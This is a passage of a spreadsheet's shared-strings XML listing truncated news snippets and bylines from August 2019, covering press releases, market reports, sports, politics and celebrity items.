Newsletter. For the latest news, follow us on Facebook, Twitter, and Instagram.</t>
  </si>
  <si>
    <t>DALLAS, Aug. 13, 2019 (GLOBE NEWSWIRE) -- According to a new market report published by Lucintel, the future of the polyvinylchloride...</t>
  </si>
  <si>
    <t>Maine Virtual Academy (MEVA), a statewide online public charter school, invites parents to imagine what their children could do with the...</t>
  </si>
  <si>
    <t>Nearly 30 of Israel’s finest wine producers will be in New York on September 10 to pour wines for public tasting, accompanied by...</t>
  </si>
  <si>
    <t>RENO, Nev. The University of Nevada, Reno has sealed a deal with a downtown hotel-casino to house 1,300 students for the coming school year...</t>
  </si>
  <si>
    <t>Sean Solarzano</t>
  </si>
  <si>
    <t>Nisa Investment Advisors LLC raised its stake in shares of Check Point Software Technologies Ltd. (NASDAQ:CHKP) by 222.0% in the second...</t>
  </si>
  <si>
    <t>Marval's MSM IT service management software has once again been accredited by the Service Desk Institute as SDI Standard Performance...</t>
  </si>
  <si>
    <t>BONITA SPRINGS, Fla., Aug. 21, 2019 /PRNewswire/ -- SmartAdvocate®, The leader in Legal Case Management Software is pleased to announce...</t>
  </si>
  <si>
    <t>Global Aircraft Anti-icing System Market is expected to witness a massive growth in the forecast period. Anti-icing is stated to be the...</t>
  </si>
  <si>
    <t>The U.S. Commerce Department is continuing to evaluate requests by U.S. companies to sell certain equipment to Chinese telecoms company...</t>
  </si>
  <si>
    <t>A New York City judge has rejected actor Cuba Gooding Jr's request to have his groping case thrown out. Judge Phyllis Chu said in a written...</t>
  </si>
  <si>
    <t>LAS VEGAS (AP) — Dallas Cowboys star running back Ezekiel Elliott won’t face criminal charges after scuffling with a music festival...</t>
  </si>
  <si>
    <t>ASHEVILLE, N.C. (AP) -- Terrin Vavra doubled and singled twice, scoring two runs as the Asheville Tourists defeated the Lexington Legends...</t>
  </si>
  <si>
    <t>Asian markets gained in early trading Friday after encouraging economic news from Japan and China.</t>
  </si>
  <si>
    <t>ROCHESTER, N.Y. , Aug. 22, 2019 (GLOBE NEWSWIRE) -- DSS (NYSE American: DSS), ("DSS"), a leader in anti-counterfeit, authentication and...</t>
  </si>
  <si>
    <t>Genevieve Roberts</t>
  </si>
  <si>
    <t>It was the biggest and best decision of my life. And in the end, it turned out to be surprisingly straightforward to make. I simply found...</t>
  </si>
  <si>
    <t>Infographic Details the History of USB ORANGE, Calif. (PRWEB) August 02, 2019 In anticipation of the USB 4 release, Juiced Systems, a...</t>
  </si>
  <si>
    <t>Antonio Villas-Boas, provided by</t>
  </si>
  <si>
    <t>I'm not sure what possessed me, but I took two smartphones with me during a hiking trip to Banff, Canada, one of the most beautiful places...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump said Sunday the idea of buying Greenland from Denmark has been discussed within his administration...</t>
  </si>
  <si>
    <t>CHELMSFORD, Mass.--(BUSINESS WIRE)--Aug 27, 2019-- ZOLL Medical Corporation, an Asahi Kasei Group Company that manufactures medical devices...</t>
  </si>
  <si>
    <t>HOLLAND, Mich., Aug. 23, 2019 /PRNewswire/ -- Coppercraft Distillery and the Detroit Lions today announced a multi-year sponsorship...</t>
  </si>
  <si>
    <t>HANOVER, MD, Aug. 26, 2019 (GLOBE NEWSWIRE) -- Processa Pharmaceuticals, Inc. (OTCQB: PCSA), a clinical stage biopharmaceutical company...</t>
  </si>
  <si>
    <t>Hannah Barnes</t>
  </si>
  <si>
    <t>Kylie Jenner and Travis Scott's daughter Stormi is officially 18 months old, and the toddler is already cooler than 99 percent of kids....</t>
  </si>
  <si>
    <t>JENNIFER PELTZ</t>
  </si>
  <si>
    <t>The Associated Press A living history event scheduled at Rock Creek Station State Historical Park will show what everyday life was like in...</t>
  </si>
  <si>
    <t>CLOSE An aerial view of the pumice raft making its way to Australia. (Photo: NASA Earth Observatory) A massive layer of volcanic rock...</t>
  </si>
  <si>
    <t>Core Exploration Limited (CXO.AX) shares opened the last session at 0.044, touching a high of 0.044 and a low of 0.042 , yielding a change...</t>
  </si>
  <si>
    <t>LOS ANGELES, Aug. 05, 2019 (GLOBE NEWSWIRE) -- The Schall Law Firm, a national shareholder rights litigation firm, announces the filing...</t>
  </si>
  <si>
    <t>In conjunction with the launch of their new book, “Monument Maker,” residents can join author Linda Booth Sweeney and illustrator Shawn</t>
  </si>
  <si>
    <t>In May, the US government placed an export ban on Huawei, preventing US companies (and companies using US technology) from doing business...</t>
  </si>
  <si>
    <t>Tuesday morning, at 2:26 a.m., Mount Pleasant Fire Department was dispatched to a structure fire in a multi-unit apartment building at 855...</t>
  </si>
  <si>
    <t>French lender BNP Paribas plans to bid for Deutsche Bank's equity derivatives book and is hopeful it can beat off rival bidders to secure a...</t>
  </si>
  <si>
    <t>Brian Himes</t>
  </si>
  <si>
    <t>Discovery Communications Inc. (NASDAQ:DISCA) Director Daniel E. Sanchez sold 1,059 shares of the company’s stock in a transaction dated...</t>
  </si>
  <si>
    <t>It's tough to consider anyone worried concerning the two kids put up- Twilight. Kristen Stewart's post-Bella life has been a dream, with...</t>
  </si>
  <si>
    <t>BEIJING, Aug. 2, 2019 /PRNewswire/ -- JA Solar Co., Ltd, a world-leading manufacturer of high-performance photovoltaic products, announced...</t>
  </si>
  <si>
    <t>DAMASCUS, Syria (AP) — The Latest on developments in northern Syria (all times local): 6:30 p.m. Russia's military says militants fired...</t>
  </si>
  <si>
    <t>The global knowledge process outsourcing (KPO) market is expected to reach USD 124.29 billion by 2025, according to a new report by Grand...</t>
  </si>
  <si>
    <t>Matthew Dresch</t>
  </si>
  <si>
    <t>Click to expand Replay Video UP NEXT Guatemala's presidential candidate Alejandro Giammattei votes in the country's presidential...</t>
  </si>
  <si>
    <t>Trevor Kearing</t>
  </si>
  <si>
    <t>Emerald Expositions Events (NYSE:EEX) issued an update on its FY 2019 earnings guidance on Thursday morning. The company provided earnings...</t>
  </si>
  <si>
    <t>SALT LAKE CITY (AP) — A Utah state lawmaker is the latest Republican to announce a challenge to Democratic Congressman Ben McAdams, who won...</t>
  </si>
  <si>
    <t>By Steven Daghlian |</t>
  </si>
  <si>
    <t>The US sharemarket fell by as much as 1.3% on Friday, extending the market’s losing streak to five days and making it the worst week of...</t>
  </si>
  <si>
    <t>Lahore, Aug 9 (IANS) Former captain Misbah-ul-Haq is likely to fill the post of Pakistan head coach after Pakistan Cricket Board (PCB)...</t>
  </si>
  <si>
    <t>None of the domestic data suggest that emergency measures are called for here. The Fed should save some ammunition.</t>
  </si>
  <si>
    <t>SBT Bancorp (OTCMKTS:SBTB) and MidWestOne Financial Group (NASDAQ:MOFG) are both small-cap finance companies, but which is the superior...</t>
  </si>
  <si>
    <t>Oil prices rose around 2% on Friday, regaining ground after their biggest falls in years on U.S. President Donald Trump's threat to impose...</t>
  </si>
  <si>
    <t>The Current Ratio of Park Lawn Corporation (TSX:PLC) is 2.49. The Current Ratio is used by investors to determine whether a company can...</t>
  </si>
  <si>
    <t>With the two entities announcing a game-changing intent to merge, Maine’s Infinity Federal Credit Union and Illinois’ Vibrant Credit Union...</t>
  </si>
  <si>
    <t>Names on the move ahead of the open.</t>
  </si>
  <si>
    <t>SOURCE Habitat for Humanity of Sonoma County With major support from Rebuild Wine Country and Medtronic, nine fire survivor families will...</t>
  </si>
  <si>
    <t>Kanchipuram silk sarees are the number choice for wedding and it is also the most sought after silk sarees for wedding. Kanjivaram silks...</t>
  </si>
  <si>
    <t>ROB MAADDI</t>
  </si>
  <si>
    <t>PHILADELPHIA (AP) — Carson Wentz, Jason Peters and Darren Sproles have unfinished business. The franchise quarterback, the nine-time Pro...</t>
  </si>
  <si>
    <t>WATERTOWN, Mass.--(BUSINESS WIRE)--Tetraphase Pharmaceuticals, Inc. (NASDAQ:TTPH), a biopharmaceutical company focused on commercializing...</t>
  </si>
  <si>
    <t>Elite police unit officers escort a 19-year old British woman, centre, with head covered, to Famagusta court in Paralimni, Cyprus, Monday,...</t>
  </si>
  <si>
    <t>A vaccine to protect against the common sexually transmitted infection (STI) chlamydia is safe and has shown promising signs of being...</t>
  </si>
  <si>
    <t>by Anonymous</t>
  </si>
  <si>
    <t>Data Analytics Market, By Type (Predictive, Prescriptive), Solution (Data Management, Data Visualization), Application (ERP, SCM), Industry...</t>
  </si>
  <si>
    <t>Lana Del Rey always checks where the exits are at cinemas and big events since the mass shootings in the US. The 34-year-old singer penned...</t>
  </si>
  <si>
    <t>The Major League Baseball trade time limit has come and gone. It threatened to be a comparatively uninteresting one, however matters got...</t>
  </si>
  <si>
    <t>Horde mode returns, with Gears 5 horde mode, getting a brand spanking new trailer showing off a few of the hot tricks and lines within the...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) - Unrelenting Taliban attacks like the deadly car bomb that rocked Kabul on Wednesday are undermining the credibility of...</t>
  </si>
  <si>
    <t>The fresh posted analysis document sheds faded on critical features of the international Paper Products Shredder industry akin to supplier...</t>
  </si>
  <si>
    <t>Researchers from TARA Biosystems, Inc. and GlaxoSmithKline (GSK) today published data demonstrating that TARA’s engineered...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 13, 2019 /PRNewswire/ -- Global Janus Kinase (JAK) Inhibitors Market: About this market Global janus kinase (JAK) inhibitors...</t>
  </si>
  <si>
    <t>Former Tory MP Sarah Wollaston has joined the Liberal Democrats, saying it is the best way for her to fight to remain in the EU. Dr...</t>
  </si>
  <si>
    <t>Isobel Frodsham</t>
  </si>
  <si>
    <t>Victoria Beckham has posted a video of her daughter Harper Seven horse riding during their family holiday in Italy. The fashion designer,...</t>
  </si>
  <si>
    <t>Dubai: The tennis fraternity in India and past has hailed youngster Sumit Nagal after the 22-year-historic player grew to become heads to...</t>
  </si>
  <si>
    <t>Markian Hawryluk</t>
  </si>
  <si>
    <t>Wyoming, which is among the reddest of Republican states and a bastion of free enterprise, thinks it may have found a way to end crippling...</t>
  </si>
  <si>
    <t>9am: Wagga Demonstration Garden is open on Shaw Street until noon. Contact Kerri on 0429 386 429. 9.15am: Coffee Drop to 11.15am at the...</t>
  </si>
  <si>
    <t>By ASHOK SHARMA Associated Press</t>
  </si>
  <si>
    <t>Congress party leader and former Indian finance minister P. Chidambaram addresses the media at the Congress party headquarters in New...</t>
  </si>
  <si>
    <t>Anavex Life Sciences Corp (NASDAQ:AVXL) has been given a consensus recommendation of “Buy” by the seven research firms that are currently...</t>
  </si>
  <si>
    <t>Global “Automobile Antenna Market” 2019 Industry Research Report is a professional and in-depth study on the current state of the Global...</t>
  </si>
  <si>
    <t>by Caroline Eaker &amp; Laura Taylor</t>
  </si>
  <si>
    <t>LYNCHBURG, Va. (WSET) -- Some members of the Heritage High School football team traded in their cleats for work boots. The team was...</t>
  </si>
  <si>
    <t>MOCKSVILLE, N.C. - A North Carolina police department is evicting its pet cat named Sgt. Butters, and some residents are mounting a...</t>
  </si>
  <si>
    <t>Stellar Cyber Launches Starlight 3.3 at Black Hat USA 2019; Powerful Security Analytics Solution Could Have Thwarted Capital One Breach</t>
  </si>
  <si>
    <t>The Academy of Motion Picture Arts and Sciences will be led by casting director David Rubin</t>
  </si>
  <si>
    <t>By Ben Russell</t>
  </si>
  <si>
    <t>THE trust running Bromsgrove's Princess of Wales Hospital has been told to clean up its act after it emerged it has no plans in place to...</t>
  </si>
  <si>
    <t>From smoothing scrubs to nourishing massage oils, stock up on these body goods that will leave your clients feeling soft to the touch. BiON...</t>
  </si>
  <si>
    <t>Rosen Law Firm, a global investor rights law firm, continues to investigate potential securities claims on behalf of shareholders of Uber...</t>
  </si>
  <si>
    <t>By JIMMY GOLEN AP Sports Writer</t>
  </si>
  <si>
    <t>Bryce Harper homered to give Philadelphia a fifth-inning lead, and Corey Dickerson drove in two runs with a triple and a single on...</t>
  </si>
  <si>
    <t>DUBLIN--(BUSINESS WIRE)--Aug 19, 2019-- The "Smart Home Security - Global Market Outlook (2017-2026)" report has been added to...</t>
  </si>
  <si>
    <t>A 25-year-old man has been arrested on suspicion of murdering student Libby Squire, whose body was found in the Humber. The disappearance...</t>
  </si>
  <si>
    <t>Lee Wilmot</t>
  </si>
  <si>
    <t>Record Arsenal signing impressed on his first start</t>
  </si>
  <si>
    <t>AGUASCALIENTES, Mexico (AP) -- Matt Clark hit a two-run single in the third inning, leading the Bravos de Leon to a 7-5 win over the...</t>
  </si>
  <si>
    <t>PR Leap - Recent News Releases</t>
  </si>
  <si>
    <t>GET IN TOUCH Jessica Stillwell Dorrance Publishing http://www.dorrancepublishing.com You can see the original version and more on PRLeap...</t>
  </si>
  <si>
    <t>Jordyn Woods‘ mother is praising her daughter’s perseverance in a social media post and is also revealing that the young model lost the...</t>
  </si>
  <si>
    <t>"Event Management Software Market" The Global Event Management Software is relied upon to come to an expected $XX.X billion by 2025 and it...</t>
  </si>
  <si>
    <t>Keep up to date with the latest What Franchise News sent straight to your inbox. Sign up here. WF: What was the thinking behind launching...</t>
  </si>
  <si>
    <t>Ricky Stuart is harnessing the negativity of two exasperating NRL seasons and turning it into a full-blown Canberra tilt at the 2019 crown....</t>
  </si>
  <si>
    <t>Unb, Dhaka</t>
  </si>
  <si>
    <t>BNP Secretary General Mirza Fakhrul Islam Alamgir yesterday said their party wants to make the hands of the government stronger to resolve...</t>
  </si>
  <si>
    <t>SOURCE: Aflac Fordham University’s Gabelli School of Business, along with the Norwegian School of Economics, and market research firm...</t>
  </si>
  <si>
    <t>Intercontinental Exchange Inc , which owns the New York Stock Exchange, on Thursday beat analysts' estimates for quarterly profit, helped...</t>
  </si>
  <si>
    <t>Coinonat (CURRENCY:CXT) traded down 75.6% against the dollar during the twenty-four hour period ending at 23:00 PM ET on August 24th. One...</t>
  </si>
  <si>
    <t>NewsUSA</t>
  </si>
  <si>
    <t>(NewsUSA) - Many older adults experience feelings of loneliness and isolation as they age, but pets can provide the companionship and love...</t>
  </si>
  <si>
    <t>Thomas Buckley</t>
  </si>
  <si>
    <t>(Bloomberg) -- Morgan Stanley has lost a number of senior analysts and salespeople in Europe this year, according to people familiar with...</t>
  </si>
  <si>
    <t>Taseko Mines (NYSEAMERICAN:TGB) (TSE:TKO) will post its Q2 quarterly earnings results after the market closes on Wednesday, August 7th....</t>
  </si>
  <si>
    <t>AUBURN HILLS, Mich., August 8, 2019 – Mahindra Automotive North America (MANA) has signed a Letter of Intent with RACER Trust to evaluate...</t>
  </si>
  <si>
    <t>JACKSONVILLE, Fla., Aug. 2, 2019 /PRNewswire-PRWeb/ -- Every year, millions of youth embark on careers they're not suited for. While this...</t>
  </si>
  <si>
    <t>Mark James</t>
  </si>
  <si>
    <t>Convergence Investment Partners LLC boosted its stake in McKesson Co. (NYSE:MCK) by 616.3% during the 2nd quarter, according to its most...</t>
  </si>
  <si>
    <t>Zack Ford</t>
  </si>
  <si>
    <t>Trump is "trying to move this country forward, and comments like that take us backwards," a spokesperson said.</t>
  </si>
  <si>
    <t>SACRAMENTO, Calif., Aug. 30, 2019 /PRNewswire-PRWeb/ -- Bacteria, Fungi, Parasites, Sharp Objects and Viruses – Oh My! "Walking barefoot on...</t>
  </si>
  <si>
    <t>When the United States declared China a currency manipulator on Monday, long-building trade tensions between the world’s two largest...</t>
  </si>
  <si>
    <t>REDWOOD CITY, Calif., Aug. 29, 2019 (GLOBE NEWSWIRE) -- Menlo Therapeutics Inc. (NASDAQ: MNLO), a late-stage biopharmaceutical company...</t>
  </si>
  <si>
    <t>Stocks would have to take a big tumble before the president’s record starts to look bad.</t>
  </si>
  <si>
    <t>DAVE HOGG</t>
  </si>
  <si>
    <t>DETROIT (AP)  Kyle Seager left Comerica Park with the first three-homer game of his career and he had no idea how it happened. Seager...</t>
  </si>
  <si>
    <t>SALT LAKE CITY (AP) — U.S. Ambassador to Russia Jon Huntsman Jr. is resigning after a two-year stint during what he called a historically...</t>
  </si>
  <si>
    <t>Daniel McCulloch</t>
  </si>
  <si>
    <t>Media chiefs have raised concerns about a "creeping secrecy that shrouds Canberra" as they demand changes to laws criminalising journalism....</t>
  </si>
  <si>
    <t>NEWARK, N.J., Aug. 27, 2019 /PRNewswire/ -- Panasonic is proud to introduce a new interchangeable standard zoom lens, the LUMIX S PRO...</t>
  </si>
  <si>
    <t>Andrew Griffin</t>
  </si>
  <si>
    <t>Apple has invited the world to the launch of the new iPhone – and might have given them a big clue about what they're about to see. The...</t>
  </si>
  <si>
    <t>STRUTHERS, Ohio (AP) — A 20-year-old Ohio man has pleaded not guilty to threatening a Jewish community center in a video police say shows...</t>
  </si>
  <si>
    <t>The Xtream Rock Island Grand Prix powered by Mediacom, the world’s largest professional go-kart street race, is celebrating its 25th...</t>
  </si>
  <si>
    <t>Originally posted on https://elitebaby.us/blogs/news/baby-proof-your-kitchen-cabinets Apart from being a great place to live, your home...</t>
  </si>
  <si>
    <t>Chris Hoffman</t>
  </si>
  <si>
    <t>Windows lets you choose large, medium, or small desktop icons. But did you know many other size options are available? You can fine-tune...</t>
  </si>
  <si>
    <t>Zach Fagenson and Gabriella Borter</t>
  </si>
  <si>
    <t>President Donald Trump has cancelled a visit to Poland and Florida's governor has expanded a state of emergency to prepare for Hurricane...</t>
  </si>
  <si>
    <t>The Metropolitan Police paid nearly £1 million to another force to investigate Carl Beech, who was jailed for his lies about a murderous...</t>
  </si>
  <si>
    <t>CANONSBURG, PA, Aug. 27, 2019 /CNW/ - Corsa Coal Corp. (TSXV: CSO; OTCQX: CRSXF) ("Corsa" or the "Company"), a premium quality...</t>
  </si>
  <si>
    <t>Free report about instant powerful relief from the stress of debt and credit card lawsuits using the power of the bankruptcy code to stop...</t>
  </si>
  <si>
    <t>Patrick Goodenough</t>
  </si>
  <si>
    <t>Defense Secretary Mark Esper speaks to reporters over the Pacific Ocean on Friday. (Photo: DoD/Amber I. Smith) (CNSNews.com) – With the...</t>
  </si>
  <si>
    <t>By COLLEEN LONG and MICHAEL BALSAMO Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — A woman tossed a lit Molotov cocktail into the lobby of a U.S. Citizenship and Immigration Services office in Oakland...</t>
  </si>
  <si>
    <t>By Reader's letter</t>
  </si>
  <si>
    <t>I welcome July 31’s advertisement of a South Bank meeting to discuss options for pedestrians and cyclists. After the Green group opened the...</t>
  </si>
  <si>
    <t>BioTime, Inc. (NYSE American and TASE: BTX), a clinical-stage biotechnology company developing novel cell therapies for unmet medical...</t>
  </si>
  <si>
    <t>Partnership with Bahamas Institute of Business &amp; Technology provides Bahamian residents opportunity to earn a certificate or degree via...</t>
  </si>
  <si>
    <t>Michelle Nichols</t>
  </si>
  <si>
    <t>China's new ambassador to the United Nations, Zhang Jun, says that if the US wants to fight China on trade, "then we will fight" and warned...</t>
  </si>
  <si>
    <t>Source link</t>
  </si>
  <si>
    <t>MOOREFIELD, W.V., Aug. 30, 2019 (GLOBE NEWSWIRE) -- Summit Financial Group, Inc. (“Summit”) (NASDAQ: SMMF) today announces its Board of...</t>
  </si>
  <si>
    <t>Eddie Pascale</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.41 in Q1 2019. Its down 0.11, from 1.52 in 2018Q4. It turned negative, as 23 investors sold BXMT shares...</t>
  </si>
  <si>
    <t>After nine years Supercars ace James Courtney will leave the Walkinshaw Andretti United team at the end of the year. The 2010 Supercars...</t>
  </si>
  <si>
    <t>Demetrious Johnson had his moment ONE Championship fight at ONE: Dawn of Heroes. There, he was taking on Tatsumitsu Wada within the...</t>
  </si>
  <si>
    <t>By Quentin Smith</t>
  </si>
  <si>
    <t>MONROE COUNTY, Miss. (WCBI)- Some Monroe County Power Association members are wanting to catch the next wave in internet. Now they are...</t>
  </si>
  <si>
    <t>Retail Properties of America, Inc. (RPAI) Q2 2019 Earnings Conference Call July 31, 2019 11:00 ET Company Participants Michael Gaiden -...</t>
  </si>
  <si>
    <t>Scott Neuman</t>
  </si>
  <si>
    <t>Iranian President Hassan Rouhani lashed out at new U.S. sanctions imposed on the country's foreign minister, calling the Trump...</t>
  </si>
  <si>
    <t>Chinese President Xi Jinping says China and the Philippines can take a "bigger step" in the joint development of oil and gas resources in...</t>
  </si>
  <si>
    <t>Ledger Independent</t>
  </si>
  <si>
    <t>The Mason County Republicans are inviting all area Republicans and friends to join them for a GOP Rally and Picnic. The event will be held...</t>
  </si>
  <si>
    <t>Louis Dangoor</t>
  </si>
  <si>
    <t>Currently, NXT puts on five TakeOver events every year. The special shows normally take place in January, April, June, August and November,...</t>
  </si>
  <si>
    <t>Denise Davis</t>
  </si>
  <si>
    <t>Equities research analysts predict that Store Capital Corp (NYSE:STOR) will report earnings per share (EPS) of $0.48 for the current fiscal...</t>
  </si>
  <si>
    <t>AIMEE AMBROSE THE GOSHEN NEWS</t>
  </si>
  <si>
    <t>GOSHEN — A Fort Wayne man faces accusations he sold bogus insurance policies, including to victims in Goshen. Adrian Hernandez-Rodriguez,...</t>
  </si>
  <si>
    <t>By Jamie Lang</t>
  </si>
  <si>
    <t>Chilean director Ernesto “Neto” Villalobos’ third feature, “Love is the Monster,” will participate in September’s San Sebastian...</t>
  </si>
  <si>
    <t>Hannon Armstrong Sustnbl Infrstr Cap (NYSE:HASI) updated its FY 2020 earnings guidance on Thursday. The company provided earnings per share...</t>
  </si>
  <si>
    <t>Dublin, Aug. 12, 2019 (GLOBE NEWSWIRE) -- The "Cognitive Analytics - Market Analysis, Trends, and Forecasts" report has been added...</t>
  </si>
  <si>
    <t>Carolyn Dwyer</t>
  </si>
  <si>
    <t>Societe Generale lowered shares of INTERTEK GRP PL/ADR (OTCMKTS:IKTSY) from a hold rating to a sell rating in a research note released on...</t>
  </si>
  <si>
    <t>Teledyne Technologies Incorporated (NYSE:TDY) today announced that Al Pichelli, President and Chief Executive Officer, and Jason VanWees,...</t>
  </si>
  <si>
    <t>Conservative Leader Andrew Scheer stopped by a Toronto play centre on Aug. 20 to announce that if elected, his government will not tax the...</t>
  </si>
  <si>
    <t>Jind (Haryana): Setting the tone for Assembly elections in Haryana, Union Home Minister Amit Shah on Friday said the Bharatiya Janata Party...</t>
  </si>
  <si>
    <t>SOURCE KSB SE &amp; Co. KGaA FRANKENTHAL, Germany, Aug. 12, 2019 /PRNewswire/ -- The Frankenthal-based pump and valve manufacturer has been...</t>
  </si>
  <si>
    <t>HENDERSONVILLE, TN / ACCESSWIRE / August 3, 2019 / The Law Offices of Timothy L. Miles, who has been leading the fight to protect...</t>
  </si>
  <si>
    <t>Veteran British lawmakers from the ruling Conservative and opposition Labour parties have both said they would be willing to lead an...</t>
  </si>
  <si>
    <t>By Press Association</t>
  </si>
  <si>
    <t>China has lashed out at Taiwan over its offer of political asylum to participants in Hong Kong’s pro-democracy protest movement, a day...</t>
  </si>
  <si>
    <t>Tickers: PINX:WSRRF, XCNQ:HARY Tags: #Mining Vancouver, British Columbia - TheNewswire - August 27, 2019 - Harrys Manufacturing Inc....</t>
  </si>
  <si>
    <t>Zim discovers his almighty leaders never had any intention of coming to Earth and he loses confidence in himself for the first time in his...</t>
  </si>
  <si>
    <t>The Association of American Veterinary Medical Colleges recently released their annual report that includes details from the 30 accredited...</t>
  </si>
  <si>
    <t>MISSISSAUGA, Ont. — Shares in Cargojet Inc. shot higher after the company announced a new deal with Amazon.com that could see the online...</t>
  </si>
  <si>
    <t>Alex Darus -</t>
  </si>
  <si>
    <t>We need this bomber jacket.</t>
  </si>
  <si>
    <t>MARCELO SILVA DE SOUSA Associated Press</t>
  </si>
  <si>
    <t>RIO DE JANEIRO (AP) — It happens, on average, more than five times a day in Rio de Janeiro: Police open fire and someone dies. Brazilian...</t>
  </si>
  <si>
    <t>Lindsey Smith</t>
  </si>
  <si>
    <t>We're just a couple weeks away from the official start of the NFL season; which means Sunday Night Football will be back in all its glory....</t>
  </si>
  <si>
    <t>08/21/2019 17:03 LOS ANGELES (Reuters) - Action movie hero Dwayne Johnson, star of the "Jumanji" and "Fast and Furious" franchises, topped...</t>
  </si>
  <si>
    <t>Austin Sanders</t>
  </si>
  <si>
    <t>Austin’s homelessness strategy turns to housing</t>
  </si>
  <si>
    <t>CCN</t>
  </si>
  <si>
    <t>Disney Plus was trending on Twitter on Friday with over 118k tweets during their D23 Expo. Netflix was not. With a slew of major...</t>
  </si>
  <si>
    <t>By REGGIE ROSS Staff Writer The mother of a child who went missing in Holcomb last week is now facing felony charges related to child...</t>
  </si>
  <si>
    <t>by: Pam Eubanks Senior Editor</t>
  </si>
  <si>
    <t>Visitors Bureau believes upgrades will stimulate revenue for the facility.</t>
  </si>
  <si>
    <t>SHANGHAI, Aug. 22, 2019 /PRNewswire/ -- James Liang, Co-founder and Executive Chairman of Ctrip, recently attended the 2019 Yabuli China...</t>
  </si>
  <si>
    <t>CAPE TOWN, South Africa, Aug. 8, 2019 /PRNewswire-PRWeb/ -- Skynamo, the field sales app for Acumatica, today announced that it has joined...</t>
  </si>
  <si>
    <t>, , (AP) -- Jhon Sandoval hit a walk-off three-run homer in the 10th inning, as the DSL Tigers2 defeated the DSL Giants 7-4 on Wednesday....</t>
  </si>
  <si>
    <t>By James Cowen</t>
  </si>
  <si>
    <t>A man has been charged with murder following the death of a woman in Hertfordshire. The body of Christine Ford, 71, was found inside a...</t>
  </si>
  <si>
    <t>BOZEMAN -- Wildfires in the West are becoming inevitable, and communities that rethink what it means to live with them will likely fare...</t>
  </si>
  <si>
    <t>James Wood For Mailonline</t>
  </si>
  <si>
    <t>Paula Williamson was found dead aged 38 in Stoke-on-Trent late last month She had been writing a book about the couple's 'explosive'...</t>
  </si>
  <si>
    <t>BRUSSELS — NATO has agreed ways to deter Russia from launching a new medium-range missile capable of a nuclear strike on Europe, the...</t>
  </si>
  <si>
    <t>Jazmin Kopotsha</t>
  </si>
  <si>
    <t>Fashion and beauty photographer BriAnne Wills first encountered the 'cat lady' stereotype when she was 13 years old. "I started watching...</t>
  </si>
  <si>
    <t>William Davis | Reporter Attorney General Bill Barr said Saturday he was “appalled” to learn of Jeffrey Epstein’s apparent suicide and...</t>
  </si>
  <si>
    <t>Fundamental Research reissued their buy rating on shares of Timbercreek Financial (TSE:TF) in a research note published on Wednesday,...</t>
  </si>
  <si>
    <t>Symrise (FRA:SY1) received a €89.00 ($103.49) target price from equities research analysts at Warburg Research in a note issued to...</t>
  </si>
  <si>
    <t>CULPEPER, Va. (AP) — Abigail Spanberger talked about rural broadband. She held court on health care, solar energy and the border crisis....</t>
  </si>
  <si>
    <t>The Piotroski F-Score of Cars.com Inc. (NYSE:CARS) is 5. The Piotroski F-Score is a scoring system between 1-9 that determines a firm’s...</t>
  </si>
  <si>
    <t>Originally posted on https://soleraam.com/2019/06/how-to-change-financial-advisors-5-signs-its-time/ In grade school, you learned how to...</t>
  </si>
  <si>
    <t>Market volatility has been the new normal the past few weeks and for investors who want to dip their toes in the global market, they will...</t>
  </si>
  <si>
    <t>NEWPORT BEACH, Calif., Aug. 29, 2019 /PRNewswire/ -- Chipotle Mexican Grill (NYSE: CMG) announced today that it's hosting a...</t>
  </si>
  <si>
    <t>Innergex Renewable Energy (TSE:INE) received a C$17.50 target price from equities research analysts at Raymond James in a research report...</t>
  </si>
  <si>
    <t>Jordy and T-Bob continued to break down what has come out of LSU Fall football camp. Athlon Sports put out a list of anonymous quotes from...</t>
  </si>
  <si>
    <t>Sentiment for Northwest Pipe Co (NASDAQ:NWPX) Northwest Pipe Co (NASDAQ:NWPX) institutional sentiment decreased to 1.07 in Q1 2019. Its...</t>
  </si>
  <si>
    <t>Ben Cohen 0 comment Ben Cohen has said hearing loss and “screaming” tinnitus can drive some people to “do the unthinkable”. The former...</t>
  </si>
  <si>
    <t>Photo: Disney/David Appleby/Paramount/Kobal/REX/Shutterstock/Marvel Studios...</t>
  </si>
  <si>
    <t>EL AL Israel Airlines Ltd. Announced Today Its Financial Results for the Second Quarter of 2019 and the First Half Year 2019 ...</t>
  </si>
  <si>
    <t>NEXT Financial Group Inc lifted its holdings in iShares Core High Dividend ETF (NYSEARCA:HDV) by 552.4% during the 2nd quarter, according...</t>
  </si>
  <si>
    <t>"I think that's his only reelection strategy that will work for him" to sure up the economy and stock market, says Siegel.</t>
  </si>
  <si>
    <t>Community Contributor</t>
  </si>
  <si>
    <t>This week, I convened a discussion about building safety in response to the recent attack that happened on the Embarcadero. I know so many...</t>
  </si>
  <si>
    <t>Micah Toll</t>
  </si>
  <si>
    <t>Evoke Motorcycles has announced that its 2020 line of Urban electric motorcycles has received a number of updates to improve rider...</t>
  </si>
  <si>
    <t>DAVID EGGERT</t>
  </si>
  <si>
    <t>LANSING, Mich. (AP)  The Michigan House approved a resolution Thursday urging the resignation of a lawmaker who is facing federal charges...</t>
  </si>
  <si>
    <t>By James Pero For Dailymail.com</t>
  </si>
  <si>
    <t>The military is testing surveillance balloons across the central U.S. Devices will use radar and potentially video to track the movements...</t>
  </si>
  <si>
    <t>Brian Lowry, CNN</t>
  </si>
  <si>
    <t>Audiences crave crime drama, ratings show</t>
  </si>
  <si>
    <t>Premier and Minister for Trade The Honourable Annastacia Palaszczuk</t>
  </si>
  <si>
    <t>Anzac Square in Brisbane has been fully restored and enhanced after the completion of almost $22 million in works to the state’s war...</t>
  </si>
  <si>
    <t>Shockingly Different Leadership (SDL) has announced the final speaker line-up for the 8 micro-learning strategy labs which make up the 2019...</t>
  </si>
  <si>
